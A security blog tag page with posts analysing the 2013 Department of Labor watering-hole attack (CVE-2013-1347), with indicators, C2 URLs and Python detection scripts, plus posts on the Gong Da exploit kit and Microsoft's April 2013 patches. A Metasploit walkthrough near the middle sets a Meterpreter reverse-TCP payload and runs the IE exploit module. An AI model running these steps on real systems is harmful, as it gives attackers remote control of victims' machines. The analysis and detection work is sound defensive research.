Posts tagged Microsoft
On April 30th, the watering hole campaign was reported on a private mailing list, and on May 1st Invincea and AlienVault publicly reported, with technical details, that the United States Department of Labor (DOL) Site Exposure Matrices (SEM) website had been compromised and was hosting malicious code. This malicious code was used in a watering hole attack targeting, at first, employees of the US Department of Energy who work on nuclear weapons programs. The malicious code was also used to gather information on the visitors of the compromised website.
The exploit used in this campaign was first reported as CVE-2012-4792, an Internet Explorer 0day used in December 2012 in the CFR.org watering hole campaign and patched by Microsoft in January 2013. Despite the patch release, some forks of this exploit were still used in targeted attacks against political parties, political dissidents, online media and human rights activists.
Two days later, FireEye, Invincea and AlienVault concluded that the vulnerability targeted during this attack campaign was not CVE-2012-4792, as they originally reported, but a new Internet Explorer 8 vulnerability identified as CVE-2013-1347. Unfortunately, this correction came too late: casual attackers, chaotic actors, organized crime and potentially other states involved in sponsored espionage had already had the opportunity to study the attack and recover the evidence.
Microsoft acknowledged the vulnerability in a Microsoft Security Advisory published on May 3rd and identified as MSA-2847140, and provided a “Fix it” solution to mitigate the Internet Explorer 8 vulnerability.
Also, Adobe announced through APSA13-03 that a critical vulnerability (CVE-2013-3336) is currently being exploited against ColdFusion. This vulnerability could permit an unauthorized user to remotely retrieve files stored on the server through the “CFIDE/administrator”, “CFIDE/adminapi” and “CFIDE/gettingstarted*” directories. Adobe ColdFusion is used by DOL, and this vulnerability was surely used to compromise the server.
Possible Causes of Confusion between CVE-2012-4792 and CVE-2013-1347
Confusion with CVE-2012-4792 was possible due to similarities in the code and techniques used:
- “function getCookieVal(offset)”, widely used, is also present in the original CVE-2012-4792 exploit and other forks.
- “function GetCookie(name)”, widely used, is also present in the original CVE-2012-4792 exploit and other forks.
- “function SetCookie(name,value)”, widely used, is also present in the original CVE-2012-4792 exploit and other forks.
- “var ua = window.navigator.userAgent.toLowerCase()”, widely used, is also present in the original CVE-2012-4792 exploit and other forks.
- “function DisplayInfo()”, also seen in the CVE-2012-4792 & CVE-2011-0611 exploits.
- “function download()” & “function callback()”, also seen in the CVE-2012-4792 exploit.
- Usage of Ajax XMLHttpRequest.
- Usage of the HTML+TIME technique. HTML+TIME, which is based on the Synchronized Multimedia Integration Language (SMIL), was also used in certain CVE-2012-4792 exploits; the technique was explained by Exodus Intel at the beginning of January 2013.
- Parts of the code target only Windows XP, Internet Explorer 8 and certain languages, as in CVE-2012-4792.
Differences between CVE-2012-4792 and CVE-2013-1347, and Particularities
Some new particularities were present in the exploit and the associated watering hole campaign:
- Usage of PHP files.
- Usage of Base64 obfuscation. Obfuscation with base64 encoding (“base64.js” file) was used to hide parts of the exploit, whereas CVE-2012-4792 used a “robots.txt” obfuscated with substitutions and HEX encoding.
As mentioned by sinn3r of the Metasploit team, CVE-2012-4792 was a CButton object use-after-free, whereas CVE-2013-1347 is a CGenericElement object use-after-free.
dol[.]ns01[.]us Exploit Hosting Domain Evolution
You can observe this evolution in the urlQuery submission of 2013-04-30.
All these urlQuery submissions were done with a non-Internet Explorer 8 user agent, and as the malicious exploit code was designed to target only Windows XP and Internet Explorer 8, part of the redirection chain was not captured as evidence.
The first inclusion, “/web/xss.php”, was used to gather information on the DOL website visitors, and the second inclusion, “/update/index.php”, was used to start the exploitation of CVE-2013-1347.
Information Gathering Scripts
DOL Information Gathering Functions
| Function | Browser | Purpose |
|---|---|---|
| jstocreate() | Internet Explorer | Test for the presence of the Avira, Bitdefender 2013, McAfee VirusScan Enterprise, AVG Secure Search, ESET NOD32, Dr.Web, Microsoft Security Essentials, Sophos, F-Secure Antivirus 2011, Kaspersky 2012 and Kaspersky 2013 anti-virus products. |
| flashver() | Internet Explorer, Firefox & Chrome | Test for the presence and version of Adobe Flash, and the supported OS. |
| officever() | Internet Explorer | Test for the presence and version of Microsoft Office. |
| plugin_pdf_ie() | Internet Explorer | Test for the presence of Adobe Reader. |
| bitdefender2012check() | Internet Explorer, Firefox & Chrome | Test for the presence of BitDefender 2012 and try to disable it through the disabledbitdefender_2012() function. |
| java() | Internet Explorer, Firefox & Chrome | Test for the presence and version of the Oracle Java plug-in. |
| xunleicheck() | Firefox & Chrome | Test for the presence of the xThunder Chrome extension, an extension managing popular downloaders. |
| kavcheck() | Firefox & Chrome | Test for the presence of the Kaspersky Chrome extension. |
| fiddlercheck() | Firefox & Chrome | Test for the presence of the Fiddler Chrome extension. Fiddler is an HTTP debugging proxy server application. |
| liveheadercheck() | Firefox & Chrome | Test for the presence of the Live HTTP Headers Chrome extension. |
| webdevelopercheck() | Firefox & Chrome | Test for the presence of the Web Developer Chrome extension. |
| avg2012check() | Firefox & Chrome | Test for the presence of the AVG 2012 Chrome extension. |
| tamperdatacheck() | Firefox & Chrome | Test for the presence of the Tamper Data Chrome extension. |
| adblockcheck() | Firefox & Chrome | Test for the presence of the Adblocker Chrome extension. |
| avastcheck() | Firefox & Chrome | Test for the presence of the Avast! Chrome extension. |
| pluginverother() | Firefox & Chrome | Test for the presence of all installed modules (plug-in enumeration). |
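The shared code fragments listed in the confusion section above and the reconnaissance function names in the table are exactly the kind of static indicators an analyst can hunt for in captured pages, with the complication that the CVE-2013-1347 campaign hid parts of its code behind base64 (“base64.js”). The following Python triage script is an added example, not code from the original post or from the campaign: it scans a page for those fragments, decodes any long base64 literals it finds and rescans the decoded text, then gives a verdict. The “#default#time2” string used as the HTML+TIME marker is the behaviour import that technique relies on; the sample page, the hypothetical decode64() helper name and the hit threshold in classify() are constructed assumptions for the demonstration.

```python
import base64
import re

# Code fragments the post lists as shared between the CVE-2012-4792 forks and the
# CVE-2013-1347 exploit, plus the HTML+TIME behaviour import ("#default#time2").
EXPLOIT_INDICATORS = (
    "function getCookieVal(",
    "function GetCookie(",
    "function SetCookie(",
    "window.navigator.userAgent.toLowerCase()",
    "function DisplayInfo(",
    "function download(",
    "function callback(",
    "XMLHttpRequest",
    "#default#time2",
)

# Reconnaissance function names from the "DOL Information Gathering Functions" table.
RECON_INDICATORS = (
    "jstocreate(", "flashver(", "officever(", "plugin_pdf_ie(",
    "bitdefender2012check(", "disabledbitdefender_2012(", "java(",
    "xunleicheck(", "kavcheck(", "fiddlercheck(", "liveheadercheck(",
    "webdevelopercheck(", "avg2012check(", "tamperdatacheck(",
    "adblockcheck(", "avastcheck(", "pluginverother(",
)

# Long runs of base64 alphabet characters: candidate obfuscated payloads.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_base64_blobs(text):
    """Return the decoded text of every long base64 literal that decodes to ASCII."""
    decoded = []
    for match in B64_BLOB.finditer(text):
        core = match.group(0).rstrip("=")
        padded = core + "=" * (-len(core) % 4)   # normalise padding before decoding
        try:
            decoded.append(base64.b64decode(padded, validate=True).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 after all, or a binary payload: skip it
    return decoded


def triage(text, max_depth=2):
    """Collect every indicator found in `text` or in base64 payloads nested inside
    it (up to `max_depth` decoding rounds, so base64-in-base64 is still caught)."""
    found = set()
    queue = [(text, 0)]
    while queue:
        current, depth = queue.pop()
        for needle in EXPLOIT_INDICATORS + RECON_INDICATORS:
            if needle in current:
                found.add(needle)
        if depth < max_depth:
            for inner in decode_base64_blobs(current):
                queue.append((inner, depth + 1))
    return found


def classify(found, min_exploit_hits=3):
    """Verdict for a set of indicators. The cookie helpers and the userAgent check
    are 'widely used' (as the post notes), so several must co-occur before a
    sample is called exploit-like; the threshold is an assumption to tune."""
    exploit_hits = sum(1 for i in found if i in EXPLOIT_INDICATORS)
    recon_hits = sum(1 for i in found if i in RECON_INDICATORS)
    if exploit_hits >= min_exploit_hits and recon_hits:
        return "exploit+recon"
    if exploit_hits >= min_exploit_hits:
        return "exploit-like"
    if recon_hits:
        return "recon"
    return "clean"


# Constructed sample page (not the real DOL code): the outer layer carries the
# shared cookie/userAgent helpers, while the recon function and the HTML+TIME
# import are hidden inside a base64 string, as the "base64.js" trick would do.
INNER_PAYLOAD = (
    'function jstocreate() { /* constructed anti-virus probe stub */ }\n'
    '<?import namespace="t" implementation="#default#time2">\n'
)
SAMPLE_PAGE = (
    '<script src="base64.js"></script>\n'
    '<script>\n'
    'var ua = window.navigator.userAgent.toLowerCase();\n'
    'function GetCookie(name) { return null; }\n'
    'var xhr = new XMLHttpRequest();\n'
    'var blob = "%s";\n'
    'document.write(decode64(blob));  // decode64: hypothetical helper from base64.js\n'
    '</script>\n'
) % base64.b64encode(INNER_PAYLOAD.encode("ascii")).decode("ascii")


if __name__ == "__main__":
    hits = triage(SAMPLE_PAGE)
    print(classify(hits), sorted(hits))
```

Running the script on the constructed page reports “exploit+recon”: the cookie helper, the lowercased user agent and the XMLHttpRequest call are visible in the outer layer, while jstocreate() and the HTML+TIME import only appear after the base64 blob is decoded. The same scan with max_depth=0 misses both, which is the point of the obfuscation layer and the reason a triage rule should decode before matching.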
Also, a specific information gathering technique was triggered when Internet Explorer was used. This technique relies on an unpatched vulnerability in Internet Explorer 8, discovered by NSFOCUS and reported to Microsoft in 2011. The vulnerability could allow user information, and even local file content, to leak if a user views a specially crafted webpage with Internet Explorer.
Once all the information is gathered, the script sends all the data to a specific URL, “hxxp://dol[.]ns01[.]us:8081/web/js.php”, and also calls “hxxp://dol[.]ns01[.]us:8081/web/css.js” once the information has been collected.
An interesting detail regarding “/web/css.js” is that the “Last Modified” date reported by the “dol[.]ns01[.]us” server is Thu, 14 Mar 2013 20:06:36 GMT. This indicates that the information gathering infrastructure had been in place since at least mid-March.
Interesting facts regarding these information gathering scripts are:
- The scripts “xss.php”, “js.php” & “css.js” have moved from IP 96[.]44[.]136[.]115 on port 80/TCP to the domain dol[.]ns01[.]us on port 8081/TCP. Moving from port 80/TCP to 8081/TCP doesn’t seem logical: most of the time, the outgoing connections authorized on firewalls for corporate Web surfing are 80/TCP and 443/TCP.
- Different types of information gathering scripts were in place, and all users who visited the DOL website were affected by this information gathering campaign.
- Usage of a specific information leakage vulnerability present in Internet Explorer 8 and not fixed by Microsoft.
- The BitDefender 2012 deactivation attempt is confusing. Why try to deactivate an anti-virus? This will surely generate an alert.
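The move of the collection scripts from 96[.]44[.]136[.]115:80 to dol[.]ns01[.]us:8081 is good news for a defender, because an outbound HTTP request to a non-standard port is something a proxy or firewall log can flag on its own, independently of the indicator list. The script below is an added example, not part of the original post: it walks a constructed proxy log, parses each requested URL, and raises an alert when the destination host or path matches the indicators from this post or when the egress port is outside the usual 80/443 set. The log format, the internal client addresses and the benign lines are constructed for the demonstration.

```python
from urllib.parse import urlsplit

# Indicators from the post, written un-defanged so they compare against parsed URLs.
IOC_HOSTS = {"dol.ns01.us", "96.44.136.115"}
IOC_PATHS = {"/web/xss.php", "/web/js.php", "/web/css.js", "/update/index.php"}
# Egress ports usually authorized for corporate web browsing (the post's 80/443 point).
ALLOWED_EGRESS_PORTS = {80, 443}

# Constructed proxy log (not real traffic). Fields: time client method url status
SAMPLE_LOG = """\
2013-04-29T14:02:11Z 10.1.2.33 GET http://www.sem.dol.gov/ 200
2013-04-29T14:02:12Z 10.1.2.33 GET http://dol.ns01.us:8081/web/xss.php 200
2013-04-29T14:02:13Z 10.1.2.33 POST http://dol.ns01.us:8081/web/js.php 200
2013-04-29T14:02:13Z 10.1.2.33 GET http://dol.ns01.us:8081/web/css.js 200
2013-04-29T14:05:40Z 10.1.2.34 GET http://96.44.136.115/web/xss.php 200
2013-04-29T14:06:02Z 10.1.2.35 GET https://update.example.net/index.php 200
2013-04-29T14:07:19Z 10.1.2.36 GET http://mirror.example.org:8080/pkg.tar.gz 200
"""


def inspect_request(url):
    """Return the list of reasons a single outbound URL should be flagged."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    # urlsplit only reports an explicit port; fall back to the scheme default.
    port = parts.port or (443 if parts.scheme == "https" else 80)
    reasons = []
    if host in IOC_HOSTS:
        reasons.append("ioc-host")
    if parts.path in IOC_PATHS:
        reasons.append("ioc-path")
    if port not in ALLOWED_EGRESS_PORTS:
        reasons.append("nonstandard-egress-port:%d" % port)
    return reasons


def analyze_log(text):
    """Parse the constructed log format and return one alert per flagged request."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        when, client, method, url, status = line.split()
        reasons = inspect_request(url)
        if not reasons:
            continue
        # A known indicator is high severity; an odd port alone is only a lead.
        severity = "high" if any(r.startswith("ioc-") for r in reasons) else "low"
        alerts.append({"time": when, "client": client, "method": method,
                       "url": url, "reasons": reasons, "severity": severity})
    return alerts


def clients_to_investigate(alerts):
    """Distinct internal clients that touched a known indicator. These hosts sent
    their browser/plug-in inventory to the backend and, if they ran IE8 on XP,
    may also have been served the CVE-2013-1347 exploit."""
    return sorted({a["client"] for a in alerts if a["severity"] == "high"})


if __name__ == "__main__":
    for alert in analyze_log(SAMPLE_LOG):
        print(alert["severity"], alert["client"], alert["url"], ",".join(alert["reasons"]))
    print("investigate:", clients_to_investigate(SAMPLE_LOG and analyze_log(SAMPLE_LOG)))
```

On the sample log the three dol.ns01.us:8081 requests and the one to 96.44.136.115 come out as high-severity alerts, the mirror on port 8080 is a low-severity lead, and the HTTPS request to an unrelated /index.php is left alone because only the full indicator path is matched. The client list is the starting point for host triage: confirming the browser and OS on those machines tells you whether only the inventory was lost or whether the exploit stage could have run as well.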
Information Gathered on dol[.]ns01[.]us
As described in the previous chapter, the information gathering code sends a lot of information to the backend. Fortunately for security researchers, the backend wasn’t very well protected, and all the collected information was accessible without any restriction in different web folders. Below are some statistics related to the gathered information.
Complete geolocation of the targeted source IPs
By analyzing the information sent to the backend, we can also see that DOL (www.sem.dol.gov) wasn’t the only compromised website:
- From 2013-03-15 to 2013-04-29: the University Research Co. Cambodia website (www.urccambodia.org) was the first target. This explains the high number of distinct IP addresses from Cambodia.
- From 2013-04-08 to 2013-04-24: the Awards for Excellence in Education website (www.forexcellenceineducation.org), a program of the Fraser Institute, was the second target.
- From 2013-04-08 to 2013-04-24: the ElectionGuide website (www.electionguide.org), provided by the International Foundation for Electoral Systems (IFES), was the third target.
- From 2013-04-09 to 2013-04-30: the French Institute of International Relations website (www.ifri.org) was the fourth target.
- From 2013-04-09 to 2013-04-24: the Working for America Institute website (www.workingforamerica.org) was the fifth target.
- From 2013-04-09 to 2013-04-10: the Project 2049 Institute website (www.project2049.net) was the sixth target.
- From 2013-04-10 to 2013-04-10: the Union Label and Service Trades Department website (www.unionlabel.org) was the seventh target.
- From 2013-04-11 to 2013-04-30: the Thales Catalogue website (components-subsystems.thales-catalogue.com) was the eighth target.
- From 2013-04-23 to 2013-05-01: the United States Department of Labor (DOL) Site Exposure Matrices (SEM) website (www.sem.dol.gov) was the ninth target.
Below are the hits by browser and the Internet Explorer 8 hits by OS.
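The site timeline and the browser/OS breakdown above both come out of the same raw material: the records the collection script posted to the exposed backend, each carrying a visitor IP, the referrer of the compromised page and a user agent. The following script is an added example, not the post’s own tooling, showing how those two views are derived: it groups records by referring host to get first/last seen dates and distinct visitor counts, and classifies user agents to count IE8 visitors by OS (the population the exploit stage actually targeted). The CSV layout and all records are constructed; only the two site names are taken from the post.

```python
import csv
from collections import Counter
from io import StringIO
from urllib.parse import urlsplit

# Constructed records modelled on what an exposed backend like this would store
# (timestamp, visitor IP, referrer of the compromised page, user agent).
# Not real victim data; user agents are simplified and comma-free for CSV.
SAMPLE_RECORDS = """\
ts,ip,referrer,ua
2013-03-15T08:00:00Z,203.0.113.10,http://www.urccambodia.org/,Mozilla/5.0 (Windows NT 6.1) Chrome/26.0
2013-04-01T09:30:00Z,203.0.113.11,http://www.urccambodia.org/,Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
2013-04-29T10:00:00Z,203.0.113.10,http://www.urccambodia.org/,Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
2013-04-23T11:00:00Z,198.51.100.5,http://www.sem.dol.gov/,Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
2013-05-01T12:00:00Z,198.51.100.6,http://www.sem.dol.gov/,Mozilla/5.0 (Windows NT 6.1) Firefox/20.0
"""


def load_records(text):
    """Parse the CSV dump into a list of dicts keyed by the header row."""
    return list(csv.DictReader(StringIO(text)))


def classify_ua(ua):
    """Coarse browser/OS labels from a user agent: IE8 announces itself as
    'MSIE 8.0'; Windows XP is 'Windows NT 5.1' and Windows 7 is 'Windows NT 6.1'."""
    if "MSIE 8.0" in ua:
        browser = "IE8"
    elif "MSIE " in ua:
        browser = "IE (other)"
    elif "Firefox/" in ua:
        browser = "Firefox"
    elif "Chrome/" in ua:
        browser = "Chrome"
    else:
        browser = "other"
    if "Windows NT 5.1" in ua:
        os_name = "Windows XP"
    elif "Windows NT 6.1" in ua:
        os_name = "Windows 7"
    else:
        os_name = "other"
    return browser, os_name


def summarize_by_site(text):
    """Per referring (compromised) site: first/last day seen and distinct visitor IPs."""
    sites = {}
    for rec in load_records(text):
        host = urlsplit(rec["referrer"]).hostname
        day = rec["ts"][:10]  # ISO timestamps sort lexicographically, so min/max work
        entry = sites.setdefault(host, {"first_seen": day, "last_seen": day, "ips": set()})
        entry["first_seen"] = min(entry["first_seen"], day)
        entry["last_seen"] = max(entry["last_seen"], day)
        entry["ips"].add(rec["ip"])
    return {host: {"first_seen": e["first_seen"], "last_seen": e["last_seen"],
                   "distinct_ips": len(e["ips"])} for host, e in sites.items()}


def browser_hits(text):
    """Hits per browser family across all records."""
    return Counter(classify_ua(rec["ua"])[0] for rec in load_records(text))


def ie8_by_os(text):
    """Among IE8 visitors only, hits per OS: the XP slice is the exploitable population."""
    labels = (classify_ua(rec["ua"]) for rec in load_records(text))
    return Counter(os_name for browser, os_name in labels if browser == "IE8")


if __name__ == "__main__":
    for host, stats in sorted(summarize_by_site(SAMPLE_RECORDS).items()):
        print(host, stats)
    print(dict(browser_hits(SAMPLE_RECORDS)))
    print(dict(ie8_by_os(SAMPLE_RECORDS)))
```

The per-site summary is the shape of the nine-entry list above (first seen, last seen, number of distinct addresses), and the IE8-by-OS counter isolates the visitors who matched the exploit’s Windows XP + Internet Explorer 8 filter, which is the subset worth prioritising when notifying affected organisations.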
Other Information Gathered
As you have read in the previous chapter, the ElectionGuide website (www.electionguide.org) was also targeted during this watering hole campaign. As you can see in the following urlQuery submission, dating from 2013-05-01, 96[.]44[.]136[.]115 is still present but doesn’t respond any more. Also, if you observe the urlQuery submission of 2013-05-03, 96[.]44[.]136[.]115 is still present, but a new backend server has been set up to replace the one that was deactivated.
If you observe the “Last Modified” date of the “css.js” file, the installation date of these files is at least 2013-05-03.
Also, by searching Google for some patterns matching the information gathering script, you can find some previously unknown campaigns that were using the same code.
- Watering hole campaign first reported on a private mailing list on 2013-04-30
- Watering hole campaign publicly disclosed by AlienVault and Invincea on 2013-04-30
- 0day exploit spotted by FireEye on 2013-05-03
- Microsoft Security Advisory posted on 2013-05-03
- Metasploit PoC provided on 2013-05-05
PoC provided by:
Affected version(s):
Internet Explorer 8
Tested on Windows XP Pro SP3 with:
Internet Explorer 8
This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering; an invalid, controllable memory region is used, which allows arbitrary code execution in the context of the user. Please note: this vulnerability was exploited in the wild in May 2013, in the compromise of the Department of Labor (DoL) web site.
use exploit/windows/browser/ie_cgenericelement_uaf
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit
getuid
sysinfo
Like other exploit kits, Gong Da has added support for the Oracle Java CVE-2013-1493 vulnerability, fixed in Oracle Java 6 Update 17, and has also added support for the Microsoft Internet Explorer CVE-2012-4969 and CVE-2012-4792 vulnerabilities, fixed in emergency patches in September 2012 and January 2013 respectively.
Here is the new code for CVE-2013-1493.
And here is the new code for CVE-2012-4792 (aka 4792.html) and CVE-2012-4969 (aka payload.html).
Also, a new variant of CVE-2012-1889 (xml.html) has been introduced, reducing the detection rate by anti-viruses.
As always, this new version of the Gong Da Exploit Kit was discovered on a Korean web site.
Gong Da Pack has evolved into the following diagram.
Below is some information regarding the different files:
- HcIa2.jar (aka CVE-2011-3544): 11/46 on VirusTotal.com
- bzExj6.jar (aka CVE-2012-0507): 14/45 on VirusTotal.com
- BnkLbvY3.jar (aka CVE-2012-1723): 19/46 on VirusTotal.com
- iCNpns4.jar (aka CVE-2012-4681): 28/46 on VirusTotal.com
- JdtDFRW1.jar (aka CVE-2012-5076): 16/46 on VirusTotal.com
- TolxrJG6.jar (aka CVE-2013-0422): 19/46 on VirusTotal.com
- FQxzUjYP.jar (aka CVE-2013-1493): 16/46 on VirusTotal.com
- GwDFO7.swf (aka CVE-2013-0634): 10/46 on VirusTotal.com
- xmlcoreOld.html (aka CVE-2012-1889): 18/46 on VirusTotal.com
- xml.html (aka CVE-2012-1889): 3/35 on VirusTotal.com
- xmlcoreNew.html (aka CVE-2012-1889): 10/45 on VirusTotal.com
- 4792.html (aka CVE-2012-4792): 1/46 on VirusTotal.com
- xyaKEg.html and payload.html (aka CVE-2012-4969): 5/46 on VirusTotal.com
Normally Gong Da is used against gamers, but this time the loaded malware seems to be different (analysis on ThreatExpert).
Microsoft released, on 9 April 2013, during its April Patch Tuesday, one updated security advisory and nine security bulletins. Of the nine security bulletins, two have a Critical security rating.
Microsoft Security Advisory 2755801
MSA-2755801, released in September 2012, has been updated. The security advisory concerns updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10. KB2833510 has been released for supported editions of Windows 8, Windows Server 2012, and Windows RT. The update addresses the vulnerabilities described in Adobe Security Bulletin APSB13-11.
MS13-028 – Cumulative Security Update for Internet Explorer
The MS13-028 security update, classified as Critical (remote code execution), fixes two privately reported vulnerabilities in Internet Explorer. CVE-2013-1303 (6.8 CVSS base score) and CVE-2013-1304 (6.8 CVSS base score) were discovered and privately reported by Ivan Fratric and Ben Hawkes of the Google Security Team.
MS13-029 – Vulnerability in Remote Desktop Client Could Allow Remote Code Execution
The MS13-029 security update, classified as Critical (remote code execution), fixes one privately reported vulnerability in the Windows Remote Desktop Client. CVE-2013-1296 (9.3 CVSS base score) was discovered and privately reported by c1d2d9acc746ae45eeb477b97fa74688, working with HP’s Zero Day Initiative.
MS13-030 – Vulnerability in SharePoint Could Allow Information Disclosure
The MS13-030 security update, classified as Important (information disclosure), fixes one publicly reported vulnerability in Microsoft SharePoint Server. CVE-2013-1290 (3.5 CVSS base score) was publicly disclosed.
MS13-031 – Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
The MS13-031 security update, classified as Important (elevation of privilege), fixes two privately reported vulnerabilities in Microsoft Windows. CVE-2013-1284 (4.9 CVSS base score) and CVE-2013-1294 (4.9 CVSS base score) were discovered and privately reported by Gynvael Coldwind and Mateusz “j00ru” Jurczyk of Google Inc.
MS13-032 – Vulnerability in Active Directory Could Lead to Denial of Service
The MS13-032 security update, classified as Important (denial of service), fixes one privately reported vulnerability in Active Directory. CVE-2013-1282 (unknown CVSS base score) was discovered and privately reported.
MS13-033 – Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of Privilege
The MS13-033 security update, classified as Important (elevation of privilege), fixes one privately reported vulnerability. CVE-2013-1295 (5.0 CVSS base score) was discovered and privately reported by George Georgiev Valkov.
MS13-034 – Vulnerability in Microsoft Antimalware Client Could Allow Elevation of Privilege
The MS13-034 security update, classified as Important (elevation of privilege), fixes one privately reported vulnerability in the Microsoft Antimalware Client. CVE-2013-0078 (7.2 CVSS base score) was discovered and privately reported.
MS13-035 – Vulnerability in HTML Sanitization Component Could Allow Elevation of Privilege
The MS13-035 security update, classified as Important (elevation of privilege), fixes one privately reported vulnerability in Microsoft Office. CVE-2013-1289 (4.3 CVSS base score) was discovered and privately reported by Drew Hintz of the Google Security Team.
MS13-036 – Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
The MS13-036 security update, classified as Important (elevation of privilege), fixes three privately reported vulnerabilities and one publicly disclosed vulnerability in Microsoft Windows. CVE-2013-1283 (6.9 CVSS base score) and CVE-2013-1292 (6.9 CVSS base score) were discovered and privately reported by Gynvael Coldwind and Mateusz “j00ru” Jurczyk of Google Inc. CVE-2013-1293 (6.9 CVSS base score) was publicly disclosed by Gynvael Coldwind and Mateusz “j00ru” Jurczyk of Google Inc. CVE-2013-1291 (7.1 CVSS base score) was discovered and privately reported by Wang Yu.